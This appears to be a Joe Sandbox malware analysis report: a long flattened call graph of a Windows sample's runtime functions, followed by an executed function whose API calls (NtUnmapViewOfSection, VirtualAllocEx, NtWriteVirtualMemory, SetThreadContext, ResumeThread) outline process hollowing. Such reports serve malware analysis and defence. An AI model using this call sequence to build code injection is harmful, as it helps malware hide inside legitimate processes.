11896->11898 11899 40b0f4 11897->11899 11900 405342 _free 66 API calls 11897->11900 11898->11897 11901 405342 _free 66 API calls 11899->11901 11904 40b106 11899->11904 11900->11899 11901->11904 11902 40b118 11903 40b12a 11902->11903 11906 405342 _free 66 API calls 11902->11906 11907 40b13c 11903->11907 11908 405342 _free 66 API calls 11903->11908 11904->11902 11905 405342 _free 66 API calls 11904->11905 11905->11902 11906->11903 11909 40b14e 11907->11909 11910 405342 _free 66 API calls 11907->11910 11908->11907 11911 40b160 11909->11911 11913 405342 _free 66 API calls 11909->11913 11910->11909 11912 40b172 11911->11912 11914 405342 _free 66 API calls 11911->11914 11915 40b184 11912->11915 11916 405342 _free 66 API calls 11912->11916 11913->11911 11914->11912 11917 40b196 11915->11917 11918 405342 _free 66 API calls 11915->11918 11916->11915 11919 40b1a8 11917->11919 11920 405342 _free 66 API calls 11917->11920 11918->11917 11921 405342 _free 66 API calls 11919->11921 11919->11922 11920->11919 11921->11922 11922->11893 11924 40ae74 11923->11924 11934 40aecc 11923->11934 11925 405342 _free 66 API calls 11924->11925 11926 40ae84 11924->11926 11925->11926 11927 40ae96 11926->11927 11928 405342 _free 66 API calls 11926->11928 11929 40aea8 11927->11929 11931 405342 _free 66 API calls 11927->11931 11928->11927 11930 40aeba 11929->11930 11932 405342 _free 66 API calls 11929->11932 11933 405342 _free 66 API calls 11930->11933 11930->11934 11931->11929 11932->11930 11933->11934 11934->11894 11936 40aa54 11935->11936 12108 405fb3 11935->12108 11937 405342 _free 66 API calls 11936->11937 11938 40aa5c 11937->11938 11939 405342 _free 66 API calls 11938->11939 11940 40aa64 11939->11940 11941 405342 _free 66 API calls 11940->11941 11942 40aa6c 11941->11942 11943 405342 _free 66 API calls 11942->11943 11944 40aa74 11943->11944 11945 405342 _free 66 API calls 11944->11945 11946 40aa7c 11945->11946 11947 405342 _free 66 API calls 11946->11947 11948 40aa84 11947->11948 11949 405342 _free 66 API calls 11948->11949 11950 40aa8b 11949->11950 11951 405342 _free 66 API calls 11950->11951 11952 40aa93 11951->11952 11953 405342 _free 66 API calls 11952->11953 11954 40aa9b 11953->11954 11955 405342 _free 66 API calls 11954->11955 11956 40aaa3 11955->11956 11957 405342 _free 66 API calls 11956->11957 11958 40aaab 11957->11958 11959 405342 _free 66 API calls 11958->11959 11960 40aab3 11959->11960 11961 405342 _free 66 API calls 11960->11961 11962 40aabb 11961->11962 11963 405342 _free 66 API calls 11962->11963 11964 40aac3 11963->11964 11965 405342 _free 66 API calls 11964->11965 11966 40aacb 11965->11966 11967 405342 _free 66 API calls 11966->11967 11968 40aad3 11967->11968 11969 405342 _free 66 API calls 11968->11969 11970 40aade 11969->11970 11971 405342 _free 66 API calls 11970->11971 11972 40aae6 11971->11972 11973 405342 _free 66 API calls 11972->11973 11974 40aaee 11973->11974 11975 405342 _free 66 API calls 11974->11975 11976 40aaf6 11975->11976 11977 405342 _free 66 API calls 11976->11977 11978 40aafe 11977->11978 11979 405342 _free 66 API calls 11978->11979 11980 40ab06 11979->11980 11981 405342 _free 66 API calls 11980->11981 11982 40ab0e 11981->11982 11983 405342 _free 66 API calls 11982->11983 11984 40ab16 11983->11984 11985 405342 _free 66 API calls 11984->11985 11986 40ab1e 11985->11986 11987 405342 _free 66 API calls 11986->11987 11988 40ab26 11987->11988 11989 405342 _free 66 API calls 11988->11989 11990 40ab2e 11989->11990 11991 405342 _free 66 API calls 11990->11991 11992 40ab36 11991->11992 11993 405342 _free 66 API calls 11992->11993 11994 40ab3e 11993->11994 11995 405342 _free 66 API calls 11994->11995 11996 40ab46 11995->11996 11997 405342 _free 66 API calls 11996->11997 11998 40ab4e 11997->11998 11999 405342 _free 66 API calls 11998->11999 12000 40ab56 11999->12000 12001 405342 _free 66 API calls 12000->12001 12002 40ab64 12001->12002 12003 405342 _free 66 API calls 12002->12003 12004 40ab6f 12003->12004 12005 405342 _free 66 API calls 12004->12005 12006 40ab7a 12005->12006 12007 405342 _free 66 API calls 12006->12007 12008 40ab85 12007->12008 12009 405342 _free 66 API calls 12008->12009 12010 40ab90 12009->12010 12011 405342 _free 66 API calls 12010->12011 12012 40ab9b 12011->12012 12013 405342 _free 66 API calls 12012->12013 12014 40aba6 12013->12014 12015 405342 _free 66 API calls 12014->12015 12016 40abb1 12015->12016 12017 405342 _free 66 API calls 12016->12017 12018 40abbc 12017->12018 12019 405342 _free 66 API calls 12018->12019 12020 40abc7 12019->12020 12021 405342 _free 66 API calls 12020->12021 12022 40abd2 12021->12022 12023 405342 _free 66 API calls 12022->12023 12024 40abdd 12023->12024 12025 405342 _free 66 API calls 12024->12025 12026 40abe8 12025->12026 12027 405342 _free 66 API calls 12026->12027 12028 40abf3 12027->12028 12029 405342 _free 66 API calls 12028->12029 12030 40abfe 12029->12030 12031 405342 _free 66 API calls 12030->12031 12032 40ac09 12031->12032 12033 405342 _free 66 API calls 12032->12033 12034 40ac17 12033->12034 12035 405342 _free 66 API calls 12034->12035 12036 40ac22 12035->12036 12037 405342 _free 66 API calls 12036->12037 12038 40ac2d 12037->12038 12039 405342 _free 66 API calls 12038->12039 12040 40ac38 12039->12040 12041 405342 _free 66 API calls 12040->12041 12042 40ac43 12041->12042 12043 405342 _free 66 API calls 12042->12043 12044 40ac4e 12043->12044 12045 405342 _free 66 API calls 12044->12045 12046 40ac59 12045->12046 12047 405342 _free 66 API calls 12046->12047 12048 40ac64 12047->12048 12049 405342 _free 66 API calls 12048->12049 12050 40ac6f 12049->12050 12051 405342 _free 66 API calls 12050->12051 12052 40ac7a 12051->12052 12053 405342 _free 66 API calls 12052->12053 12054 40ac85 12053->12054 12055 405342 _free 66 API calls 12054->12055 12056 40ac90 12055->12056 12057 405342 _free 66 API calls 12056->12057 12058 40ac9b 12057->12058 12059 405342 _free 66 API calls 12058->12059 12060 40aca6 12059->12060 12061 405342 _free 66 API calls 12060->12061 12062 40acb1 12061->12062 12063 405342 _free 66 API calls 12062->12063 12064 40acbc 12063->12064 12065 405342 _free 66 API calls 12064->12065 12066 40acca 12065->12066 12067 405342 _free 66 API calls 12066->12067 12068 40acd5 12067->12068 12069 405342 _free 66 API calls 12068->12069 12070 40ace0 12069->12070 12071 405342 _free 66 API calls 12070->12071 12072 40aceb 12071->12072 12073 405342 _free 66 API calls 12072->12073 12074 40acf6 12073->12074 12075 405342 _free 66 API calls 12074->12075 12076 40ad01 12075->12076 12077 405342 _free 66 API calls 12076->12077 12078 40ad0c 12077->12078 12079 405342 _free 66 API calls 12078->12079 12080 40ad17 12079->12080 12081 405342 _free 66 API calls 12080->12081 12082 40ad22 12081->12082 12083 405342 _free 66 API calls 12082->12083 12084 40ad2d 12083->12084 12085 405342 _free 66 API calls 12084->12085 12086 40ad38 12085->12086 12087 405342 _free 66 API calls 12086->12087 12088 40ad43 12087->12088 12089 405342 _free 66 API calls 12088->12089 12090 40ad4e 12089->12090 12091 405342 _free 66 API calls 12090->12091 12092 40ad59 12091->12092 12093 405342 _free 66 API calls 12092->12093 12094 40ad64 12093->12094 12095 405342 _free 66 API calls 12094->12095 12096 40ad6f 12095->12096 12097 405342 _free 66 API calls 12096->12097 12098 40ad7d 12097->12098 12099 405342 _free 66 API calls 12098->12099 12100 40ad88 12099->12100 12101 405342 _free 66 API calls 12100->12101 12102 40ad93 12101->12102 12103 405342 _free 66 API calls 12102->12103 12104 40ad9e 12103->12104 12105 405342 _free 66 API calls 12104->12105 12106 40ada9 12105->12106 12107 405342 _free 66 API calls 12106->12107 12107->12108 12108->11877 12109->11850 12111 4057f5 12110->12111 12114 405741 _memset 12110->12114 12116 401114 __atoldbl_l 5 API calls 12111->12116 12120 40a204 12114->12120 12118 40589b 12116->12118 12118->11809 12119 40a0d7 ___crtLCMapStringA 82 API calls 12119->12111 12121 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12120->12121 12122 40a217 12121->12122 12130 40a11d 12122->12130 12125 40a0d7 12126 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12125->12126 12127 40a0ea 12126->12127 12147 409ef0 12127->12147 12131 40a146 MultiByteToWideChar 12130->12131 12132 40a13b 12130->12132 12133 40a16f 12131->12133 12136 40a173 12131->12136 12132->12131 12134 401114 __atoldbl_l 5 API calls 12133->12134 12135 4057b0 12134->12135 12135->12125 12137 4044b9 _malloc 66 API calls 12136->12137 12139 40a188 _memset __crtLCMapStringA_stat 12136->12139 12137->12139 12138 40a1c1 MultiByteToWideChar 12140 40a1d7 GetStringTypeW 12138->12140 12141 40a1e8 12138->12141 12139->12133 12139->12138 12140->12141 12143 4092cc 12141->12143 12144 4092d8 12143->12144 12145 4092e9 12143->12145 12144->12145 12146 405342 _free 66 API calls 12144->12146 12145->12133 12146->12145 12148 409f0e MultiByteToWideChar 12147->12148 12153 409f73 12148->12153 12160 409f6c 12148->12160 12150 401114 __atoldbl_l 5 API calls 12152 4057d0 12150->12152 12151 409fc0 MultiByteToWideChar 12154 409fd9 LCMapStringW 12151->12154 12170 40a0b8 12151->12170 12152->12119 12155 4044b9 _malloc 66 API calls 12153->12155 12159 409f8c __crtLCMapStringA_stat 12153->12159 12156 409ff8 12154->12156 12154->12170 12155->12159 12158 40a002 12156->12158 12163 40a02b 12156->12163 12157 4092cc __freea 66 API calls 12157->12160 12161 40a016 LCMapStringW 12158->12161 12158->12170 12159->12151 12159->12160 12160->12150 12161->12170 12162 40a07a LCMapStringW 12164 40a090 WideCharToMultiByte 12162->12164 12165 40a0b2 12162->12165 12166 40a046 __crtLCMapStringA_stat 12163->12166 12167 4044b9 _malloc 66 API calls 12163->12167 12164->12165 12168 4092cc __freea 66 API calls 12165->12168 12166->12162 12166->12170 12167->12166 12168->12170 12170->12157 12171->11812 12175 403121 DecodePointer 12172->12175 12176 403136 12175->12176 12177 4030e2 __invoke_watson 10 API calls 12176->12177 12178 40314d 12177->12178 12179 403121 __invalid_parameter_noinfo_noreturn 10 API calls 12178->12179 12180 40315a 12179->12180 12180->11739 12182 405075 EncodePointer 12181->12182 12182->12182 12183 40508f 12182->12183 12183->11426 12187 40124a 12184->12187 12186 401293 12186->11428 12188 401256 __alloc_osfhnd 12187->12188 12195 401ab7 12188->12195 12194 401277 __alloc_osfhnd 12194->12186 12196 4047fa __lock 66 API calls 12195->12196 12197 40125b 12196->12197 12198 401163 DecodePointer DecodePointer 12197->12198 12199 401191 12198->12199 12200 401212 12198->12200 12199->12200 12212 401a41 12199->12212 12209 401280 12200->12209 12202 4011f5 EncodePointer EncodePointer 12202->12200 12203 4011c7 12203->12200 12206 4019a1 __realloc_crt 70 API calls 12203->12206 12207 4011e3 EncodePointer 12203->12207 12204 4011a3 12204->12202 12204->12203 12219 4019a1 12204->12219 12208 4011dd 12206->12208 12207->12202 12208->12200 12208->12207 12245 401ac0 12209->12245 12213 401a61 HeapSize 12212->12213 12214 401a4c 12212->12214 12213->12204 12215 40177e __recalloc 66 API calls 12214->12215 12216 401a51 12215->12216 12217 40314e __cftof_l 11 API calls 12216->12217 12218 401a5c 12217->12218 12218->12204 12223 4019aa 12219->12223 12221 4019e9 12221->12203 12222 4019ca Sleep 12222->12223 12223->12221 12223->12222 12224 40454d 12223->12224 12225 404563 12224->12225 12226 404558 12224->12226 12227 40456b 12225->12227 12234 404578 12225->12234 12228 4044b9 _malloc 66 API calls 12226->12228 12230 405342 _free 66 API calls 12227->12230 12229 404560 12228->12229 12229->12223 12231 404573 _rand_s 12230->12231 12231->12223 12232 4045b0 12235 404452 _malloc DecodePointer 12232->12235 12233 404580 HeapReAlloc 12233->12231 12233->12234 12234->12232 12234->12233 12238 4045e0 12234->12238 12239 404452 _malloc DecodePointer 12234->12239 12242 4045c8 12234->12242 12236 4045b6 12235->12236 12237 40177e __recalloc 66 API calls 12236->12237 12237->12231 12240 40177e __recalloc 66 API calls 12238->12240 12239->12234 12241 4045e5 GetLastError 12240->12241 12241->12231 12243 40177e __recalloc 66 API calls 12242->12243 12244 4045cd GetLastError 12243->12244 12244->12231 12248 404709 LeaveCriticalSection 12245->12248 12247 401285 12247->12194 12248->12247 12252 408b24 12249->12252 12253 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12252->12253 12254 408b37 12253->12254 12254->11433 12256 5cbb0d __write_nolock 12255->12256 12257 5cbb32 GetTickCount SetLastError GetConsoleAliasesW 12256->12257 12263 5cbb6c 12256->12263 12258 5cbb20 12257->12258 12259 5cbb55 12257->12259 12258->12256 12260 5cbb5e CreateDirectoryW 12259->12260 12261 5cbb68 12259->12261 12260->12261 12261->12263 12262 5cbbaf 12264 5cbbbc InterlockedIncrement DestroyIcon 12262->12264 12281 5cbc58 12262->12281 12263->12262 12266 5cbba5 ResetEvent 12263->12266 12301 4066f0 12264->12301 12266->12263 12268 5cbc8d OpenJobObjectA 12269 5cbca3 10 API calls 12268->12269 12306 40129d 12269->12306 12271 5cbc28 GetStartupInfoW 12272 5cbc30 12271->12272 12274 5cbc4d 12272->12274 12275 5cbc39 GetModuleHandleExA 12272->12275 12303 401010 12274->12303 12275->12274 12276 5cbda7 12323 401123 12276->12323 12277 5cbe21 12299 5cb920 LoadLibraryA 12277->12299 12281->12268 12281->12269 12297 5cbe19 12281->12297 12283 401123 _calloc 66 API calls 12285 5cbdbf _memset 12283->12285 12284 5cbe83 12300 5cb070 LoadLibraryW GetProcAddress VirtualProtect 12284->12300 12289 401123 _calloc 66 API calls 12285->12289 12287 5cbe88 12337 5cba50 12287->12337 12290 5cbdf9 12289->12290 12294 401286 __cinit 76 API calls 12290->12294 12291 5cbef1 12291->12291 12292 5cbec5 SetProcessWorkingSetSize 12293 5cbe92 12292->12293 12293->12291 12293->12292 12295 5cbe0f 12294->12295 12330 401427 12295->12330 12298 5cb040 LocalAlloc 12297->12298 12298->12277 12299->12284 12300->12287 12302 4066fc SetDefaultCommConfigW FreeEnvironmentStringsW GetCurrentDirectoryA EnumDateFormatsExA 12301->12302 12302->12271 12302->12272 12346 5cc0f0 12303->12346 12305 40101f 12305->12281 12307 4012a9 __alloc_osfhnd 12306->12307 12308 4012b7 12307->12308 12309 4012cc _vwprintf_helper 12307->12309 12310 40177e __recalloc 66 API calls 12308->12310 12402 402117 12309->12402 12311 4012bc 12310->12311 12312 40314e __cftof_l 11 API calls 12311->12312 12315 4012c7 __alloc_osfhnd 12312->12315 12314 4012de _vwprintf_helper 12407 4021b4 12314->12407 12315->12276 12317 4012f0 _vwprintf_helper 12414 4023ca 12317->12414 12319 401308 _vwprintf_helper 12435 402250 12319->12435 12324 401853 __calloc_crt 66 API calls 12323->12324 12325 40113d 12324->12325 12326 401159 12325->12326 12327 40177e __recalloc 66 API calls 12325->12327 12326->12283 12328 401150 12327->12328 12328->12326 12329 40177e __recalloc 66 API calls 12328->12329 12329->12326 12331 401433 12330->12331 12332 401447 12330->12332 12333 40177e __recalloc 66 API calls 12331->12333 12332->12297 12334 401438 12333->12334 12335 40314e __cftof_l 11 API calls 12334->12335 12336 401443 12335->12336 12336->12297 12610 5cb990 12337->12610 12340 5cba89 FreeEnvironmentStringsW ReadEventLogA CreateNamedPipeA FileTimeToLocalFileTime 12341 5cbae4 12340->12341 12613 5cb9c0 12341->12613 12344 401114 __atoldbl_l 5 API calls 12345 5cbaf9 12344->12345 12345->12293 12347 5cc0fd 12346->12347 12350 5cd091 __ctrlfp __floor_pentium4 12346->12350 12348 5cc12e 12347->12348 12347->12350 12355 5cc178 12348->12355 12357 5ccd9c 12348->12357 12349 5cd0ff __floor_pentium4 12354 5cd0ec __ctrlfp 12349->12354 12372 5ce7f1 12349->12372 12350->12349 12353 5cd0dc 12350->12353 12350->12354 12365 5ce73b 12353->12365 12354->12305 12355->12305 12358 5ccdb4 DecodePointer 12357->12358 12360 5ccdc2 12357->12360 12358->12360 12359 5cce5e 12359->12355 12360->12359 12361 5cceab 12360->12361 12362 5cce0f 12360->12362 12361->12359 12363 40177e __recalloc 66 API calls 12361->12363 12362->12359 12364 40177e __recalloc 66 API calls 12362->12364 12363->12359 12364->12359 12366 5ce749 12365->12366 12367 5ce771 12365->12367 12383 5ce69b 12366->12383 12369 40177e __recalloc 66 API calls 12367->12369 12371 5ce776 __ctrlfp 12369->12371 12370 5ce76c 12370->12354 12371->12354 12373 5ce827 __handle_exc 12372->12373 12375 5ce84e __except2 12373->12375 12398 5ce10e 12373->12398 12376 5ce890 12375->12376 12377 5ce869 12375->12377 12378 5ce614 __except2 66 API calls 12376->12378 12379 5ce69b __umatherr 66 API calls 12377->12379 12380 5ce88b __ctrlfp 12378->12380 12379->12380 12381 401114 __atoldbl_l 5 API calls 12380->12381 12382 5ce8b4 12381->12382 12382->12354 12384 5ce6a5 12383->12384 12385 5ce71e __ctrlfp 12384->12385 12386 5ce6c0 __umatherr __ctrlfp 12384->12386 12387 5ce614 __except2 66 API calls 12385->12387 12389 5ce70e 12386->12389 12391 5ce614 12386->12391 12388 5ce733 12387->12388 12388->12370 12389->12370 12392 5ce634 12391->12392 12394 5ce61f 12391->12394 12393 40177e __recalloc 66 API calls 12392->12393 12395 5ce639 12393->12395 12394->12395 12396 40177e __recalloc 66 API calls 12394->12396 12395->12389 12397 5ce62c 12396->12397 12397->12389 12399 5ce135 __raise_exc_ex 12398->12399 12400 5ce328 RaiseException 12399->12400 12401 5ce341 12400->12401 12401->12375 12403 402124 12402->12403 12404 40213a EnterCriticalSection 12402->12404 12405 4047fa __lock 66 API calls 12403->12405 12404->12314 12406 40212d 12405->12406 12406->12314 12443 405654 12407->12443 12409 4021c3 12450 4055fe 12409->12450 12411 402216 12411->12317 12412 4021c9 _vwprintf_helper 12412->12411 12413 401910 __malloc_crt 66 API calls 12412->12413 12413->12411 12415 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12414->12415 12416 402431 12415->12416 12417 402435 12416->12417 12420 405654 __flsbuf 66 API calls 12416->12420 12430 40246c __output_l __aulldvrm _strlen 12416->12430 12418 40177e __recalloc 66 API calls 12417->12418 12419 40243a 12418->12419 12421 40314e __cftof_l 11 API calls 12419->12421 12420->12430 12422 402445 12421->12422 12423 401114 __atoldbl_l 5 API calls 12422->12423 12424 402f51 12423->12424 12424->12319 12426 40676a 97 API calls _write_string 12426->12430 12427 405342 _free 66 API calls 12427->12430 12428 402ac1 DecodePointer 12428->12430 12429 401910 __malloc_crt 66 API calls 12429->12430 12430->12417 12430->12422 12430->12426 12430->12427 12430->12428 12430->12429 12431 402b2a DecodePointer 12430->12431 12432 40231c 97 API calls _write_string 12430->12432 12433 402b4b DecodePointer 12430->12433 12434 406420 78 API calls __cftof 12430->12434 12459 4064c0 12430->12459 12431->12430 12432->12430 12433->12430 12434->12430 12436 40225b 12435->12436 12438 401319 12435->12438 12436->12438 12462 405418 12436->12462 12439 401331 12438->12439 12440 401336 _vwprintf_helper 12439->12440 12604 402185 12440->12604 12442 401341 12442->12315 12444 405660 12443->12444 12445 405675 12443->12445 12446 40177e __recalloc 66 API calls 12444->12446 12445->12409 12447 405665 12446->12447 12448 40314e __cftof_l 11 API calls 12447->12448 12449 405670 12448->12449 12449->12409 12451 40561a 12450->12451 12452 40560b 12450->12452 12454 405638 12451->12454 12455 40177e __recalloc 66 API calls 12451->12455 12453 40177e __recalloc 66 API calls 12452->12453 12458 405610 12453->12458 12454->12412 12456 40562b 12455->12456 12457 40314e __cftof_l 11 API calls 12456->12457 12457->12458 12458->12412 12460 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12459->12460 12461 4064d3 12460->12461 12461->12430 12463 405431 12462->12463 12467 405453 12462->12467 12464 405654 __flsbuf 66 API calls 12463->12464 12463->12467 12465 40544c 12464->12465 12468 409d25 12465->12468 12467->12438 12469 409d31 __alloc_osfhnd 12468->12469 12470 409d54 12469->12470 12471 409d39 12469->12471 12472 409d60 12470->12472 12478 409d9a 12470->12478 12493 401791 12471->12493 12475 401791 __lseeki64 66 API calls 12472->12475 12477 409d65 12475->12477 12476 40177e __recalloc 66 API calls 12479 409d46 __alloc_osfhnd 12476->12479 12480 40177e __recalloc 66 API calls 12477->12480 12496 40c5ab 12478->12496 12479->12467 12483 409d6d 12480->12483 12482 409da0 12484 409dc2 12482->12484 12485 409dae 12482->12485 12486 40314e __cftof_l 11 API calls 12483->12486 12488 40177e __recalloc 66 API calls 12484->12488 12506 409628 12485->12506 12486->12479 12490 409dc7 12488->12490 12489 409dba 12565 409df1 12489->12565 12491 401791 __lseeki64 66 API calls 12490->12491 12491->12489 12494 403f64 __getptd_noexit 66 API calls 12493->12494 12495 401796 12494->12495 12495->12476 12497 40c5b7 __alloc_osfhnd 12496->12497 12498 40c611 12497->12498 12501 4047fa __lock 66 API calls 12497->12501 12499 40c633 __alloc_osfhnd 12498->12499 12500 40c616 EnterCriticalSection 12498->12500 12499->12482 12500->12499 12502 40c5e3 12501->12502 12503 40c5ec InitializeCriticalSectionAndSpinCount 12502->12503 12504 40c5ff 12502->12504 12503->12504 12568 40c641 12504->12568 12507 409637 __write_nolock 12506->12507 12508 40968c 12507->12508 12509 40966d 12507->12509 12539 409662 12507->12539 12512 4096e8 12508->12512 12513 4096cb 12508->12513 12510 401791 __lseeki64 66 API calls 12509->12510 12514 409672 12510->12514 12511 401114 __atoldbl_l 5 API calls 12515 409d23 12511->12515 12517 4096fb 12512->12517 12572 40b573 12512->12572 12516 401791 __lseeki64 66 API calls 12513->12516 12518 40177e __recalloc 66 API calls 12514->12518 12515->12489 12519 4096d0 12516->12519 12522 4055fe __flsbuf 66 API calls 12517->12522 12521 409679 12518->12521 12523 40177e __recalloc 66 API calls 12519->12523 12524 40314e __cftof_l 11 API calls 12521->12524 12525 409704 12522->12525 12526 4096d8 12523->12526 12524->12539 12527 4099a6 12525->12527 12529 403fdd __getptd 66 API calls 12525->12529 12528 40314e __cftof_l 11 API calls 12526->12528 12530 4099b5 12527->12530 12531 409c56 WriteFile 12527->12531 12528->12539 12533 40971f GetConsoleMode 12529->12533 12532 409a70 12530->12532 12541 4099c8 12530->12541 12534 409988 12531->12534 12535 409c89 GetLastError 12531->12535 12548 409a7d 12532->12548 12556 409b4a 12532->12556 12533->12527 12537 409748 12533->12537 12536 409cd4 12534->12536 12534->12539 12543 409ca7 12534->12543 12535->12534 12536->12539 12542 40177e __recalloc 66 API calls 12536->12542 12537->12527 12538 409758 GetConsoleCP 12537->12538 12538->12534 12561 40977b 12538->12561 12539->12511 12540 409a12 WriteFile 12540->12535 12540->12541 12541->12534 12541->12536 12541->12540 12544 409cf7 12542->12544 12546 409cb2 12543->12546 12547 409cc6 12543->12547 12550 401791 __lseeki64 66 API calls 12544->12550 12545 409bbb WideCharToMultiByte 12545->12535 12552 409bf2 WriteFile 12545->12552 12551 40177e __recalloc 66 API calls 12546->12551 12585 4017a4 12547->12585 12548->12534 12548->12536 12549 409aec WriteFile 12548->12549 12549->12535 12549->12548 12550->12539 12554 409cb7 12551->12554 12555 409c29 GetLastError 12552->12555 12552->12556 12558 401791 __lseeki64 66 API calls 12554->12558 12555->12556 12556->12534 12556->12536 12556->12545 12556->12552 12558->12539 12559 40c3eb 78 API calls __fassign 12559->12561 12560 409827 WideCharToMultiByte 12560->12534 12562 409858 WriteFile 12560->12562 12561->12534 12561->12535 12561->12559 12561->12560 12563 40c24d WriteConsoleW CreateFileW __write_nolock 12561->12563 12564 4098ac WriteFile 12561->12564 12582 4064f8 12561->12582 12562->12535 12562->12561 12563->12561 12564->12535 12564->12561 12603 40c64a LeaveCriticalSection 12565->12603 12567 409df7 12567->12479 12571 404709 LeaveCriticalSection 12568->12571 12570 40c648 12570->12498 12571->12570 12590 40c542 12572->12590 12574 40b591 12575 40b599 12574->12575 12576 40b5aa SetFilePointer 12574->12576 12577 40177e __recalloc 66 API calls 12575->12577 12578 40b5c2 GetLastError 12576->12578 12579 40b59e 12576->12579 12577->12579 12578->12579 12580 40b5cc 12578->12580 12579->12517 12581 4017a4 __dosmaperr 66 API calls 12580->12581 12581->12579 12583 4064c0 __isleadbyte_l 76 API calls 12582->12583 12584 406507 12583->12584 12584->12561 12586 401791 __lseeki64 66 API calls 12585->12586 12587 4017af _rand_s 12586->12587 12588 40177e __recalloc 66 API calls 12587->12588 12589 4017c2 12588->12589 12589->12539 12591 40c567 12590->12591 12592 40c54f 12590->12592 12594 401791 __lseeki64 66 API calls 12591->12594 12597 40c5a6 12591->12597 12593 401791 __lseeki64 66 API calls 12592->12593 12595 40c554 12593->12595 12596 40c578 12594->12596 12598 40177e __recalloc 66 API calls 12595->12598 12599 40177e __recalloc 66 API calls 12596->12599 12597->12574 12600 40c55c 12598->12600 12601 40c580 12599->12601 12600->12574 12602 40314e __cftof_l 11 API calls 12601->12602 12602->12600 12603->12567 12605 402195 12604->12605 12606 4021a8 LeaveCriticalSection 12604->12606 12609 404709 LeaveCriticalSection 12605->12609 12606->12442 12608 4021a5 12608->12442 12609->12608 12611 5cb9b5 12610->12611 12612 5cb9a1 HeapAlloc LoadLibraryA 12610->12612 12611->12340 12611->12341 12612->12611 12614 5cb9db 12613->12614 12620 5cba08 12613->12620 12617 5cb9e7 EndUpdateResourceW WritePrivateProfileStringW 12614->12617 12614->12620 12615 5cba0f GetServiceKeyNameA 12616 5cba39 12615->12616 12618 401114 __atoldbl_l 5 API calls 12616->12618 12617->12614 12619 5cba47 12618->12619 12619->12344 12620->12615 12620->12616 12622 403e8c 12621->12622 12623 403e7d DecodePointer 12621->12623 12624 403e9d TlsFree 12622->12624 12625 403eab 12622->12625 12623->12622 12624->12625 12626 4046ce DeleteCriticalSection 12625->12626 12627 4046e6 12625->12627 12628 405342 _free 66 API calls 12626->12628 12629 4041b9 12627->12629 12630 4046f8 DeleteCriticalSection 12627->12630 12628->12625 12629->11339 12630->12627 12640 403df0 EncodePointer 12631->12640 12633 401ad1 __init_pointers __initp_misc_winsig 12641 4048b1 EncodePointer 12633->12641 12635 401af7 EncodePointer EncodePointer EncodePointer EncodePointer 12636 404668 12635->12636 12637 404673 12636->12637 12638 40467d InitializeCriticalSectionAndSpinCount 12637->12638 12639 4042aa 12637->12639 12638->12637 12638->12639 12639->11467 12639->11468 12640->12633 12641->12635 12645 401c34 12642->12645 12644 401d9b 12646 401c40 __alloc_osfhnd 12645->12646 12647 4047fa __lock 61 API calls 12646->12647 12648 401c47 12647->12648 12649 401c72 DecodePointer 12648->12649 12655 401cf1 12648->12655 12652 401c89 DecodePointer 12649->12652 12649->12655 12664 401c9c 12652->12664 12653 401d6e __alloc_osfhnd 12653->12644 12668 401d5f 12655->12668 12656 401d56 12658 401a9f __mtinitlocknum 3 API calls 12656->12658 12659 401d5f 12658->12659 12660 401d6c 12659->12660 12673 404709 LeaveCriticalSection 12659->12673 12660->12644 12661 401cb3 DecodePointer 12667 403df0 EncodePointer 12661->12667 12664->12655 12664->12661 12665 401cc2 DecodePointer DecodePointer 12664->12665 12666 403df0 EncodePointer 12664->12666 12665->12664 12666->12664 12667->12664 12669 401d65 12668->12669 12670 401d3f 12668->12670 12674 404709 LeaveCriticalSection 12669->12674 12670->12653 12672 404709 LeaveCriticalSection 12670->12672 12672->12656 12673->12660 12674->12670 12677 40383f 12675->12677 12676 408d30 __wincmdln 76 API calls 12676->12677 12677->12676 12678 4038ac 12677->12678 12679 4039aa 12678->12679 12680 408d30 76 API calls __wincmdln 12678->12680 12679->11491 12679->11493 12680->12678

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 027E0110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 027E0156
                                                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 027E016C
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 027E0255
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 027E0270
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027E0283
                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 027E029F
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 027E02C8
                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 027E02E3
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 027E0304
                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 027E032A
                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 027E0399
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 027E03BF
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 027E03E1
                                                                                                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 027E03ED
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 027E0412
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.1644755035.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_27e0000_5A89.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 93872480-0
                                                                                                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
